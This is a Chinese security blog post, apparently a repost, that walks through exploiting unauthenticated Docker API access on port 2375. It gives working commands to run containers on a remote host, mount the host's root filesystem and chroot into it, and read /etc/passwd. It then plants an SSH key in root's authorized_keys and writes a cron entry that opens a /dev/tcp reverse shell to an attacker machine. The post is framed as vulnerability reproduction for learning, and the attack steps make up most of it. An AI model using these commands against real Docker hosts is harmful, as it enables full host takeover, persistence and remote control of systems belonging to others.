Docker API未授权命令执行

Docker API未授权命令执行
2023-5-16 09:4:0 Author: 谢公子学安全(查看原文) 阅读量:20 收藏

Docker Swarm是Docker的集群管理工具，它将Docker主机池转变为单个虚拟Docker主机，能够方便的进行docker集群的管理和扩展。Docker Swarm使用标准的Docker API通过2375端口来管理每个Docker节点，Docker API是一个取代远程命令行界面(RCLI)的REST API。当Docker节点的2375端口直接暴露并未做权限检查时，存在未授权访问漏洞，攻击者可以利用Docker API执行任何操作，包括执行Docker命令，创建、删除Docker以及获得宿主机权限等。

漏洞复现

访问目标的2375端口如下接口，若有信息，则存在Docker API未授权访问

http://x.x.x.x:2375/versionhttp://x.x.x.x:2375/imageshttp://x.x.x.x:2375/info

docker命令远程管理

可以使用docker命令本地远程管理docker，命令和在docker服务器管理一样。以下只列出部分命令。

docker -H tcp://10.211.55.18:2375 images -adocker -H tcp://10.211.55.18:2375 psdocker -H tcp://10.211.55.18:2375 exec -it e7d97caf249d /bin/bash

获取宿主机权限

但是以上方式都只是控制docker中的容器，我们如何控制docker的宿主机呢？

我们可以执行如下命令启动一个未开启的容器，然后将宿主机的磁盘挂载到容器中。

docker -H tcp://10.211.55.18:2375 run -it -v /:/opt b76f96a98a27 /bin/bash

如图可以看到已经可以管理宿主机的文件系统了。

chroot

使用chroot命令切换到挂载的目录，在使用 chroot 之后，系统的目录结构将以指定的位置作为/位置。在经过 chroot 命令之后，系统读取到的目录和文件将不在是旧系统根下的而是新根下（即被指定的新的位置）的目录结构和文件。

chroot /opt bash#然后就可以执行如下一些命令，但是查看的ip和反弹shell等一些命令，还是容器内的historycat /etc/passwd

写入SSH公钥

执行如下命令将本地的authorized_keys文件上传到/opt/root/.ssh下。

docker -H tcp://10.211.55.18:2375 cp /Users/xie/Desktop/authorized_keys 4dcf21117fb2:/opt/root/.ssh

可以看到公钥文件已经写入。但是通过这种方式上传的authorized_keys文件权限不对可以看到其属主和属组不对。

这时可以执行如下命令修改authorized_keys文件的属主和属组为root，即可正常ssh免密登录。

chown root.root authorized_keys

或者可以直接通过echo命令写入公钥文件，这样就不会有权限问题。

计划任务反弹shell

如果目标宿主机的22端口没开的话，还可以通过定时任务来反弹shell到内网的机器。

执行如下命令，将反弹shell的命令写入/var/spool/cron/root文件中。

#切换到挂载的目录cd /opt/var/spool/cron#写入反弹shell的命令echo "*/1  *  *  *  *   /bin/bash -i>&/dev/tcp/10.211.55.2/4444 0>&1" > root

然后就可以收到shell了。

END

非常感谢您读到现在，由于作者的水平有限，编写时间仓促，文章中难免会出现一些错误或者描述不准确的地方，恳请各位师傅们批评指正。如果你想一起学习内网渗透、域渗透、云安全、红队攻防的话，可以加入下面的知识星球一起学习交流。

文章来源: http://mp.weixin.qq.com/s?__biz=MzI2NDQyNzg1OA==&mid=2247492668&idx=1&sn=00cf8d6ea06c9a60d044b2167870924b&chksm=eaae6401ddd9ed17392f6e847dab91f7c7485a7c354d5d48798e53e233070df9e5aba0450845#rd
如有侵权请联系:admin#unsafe.sh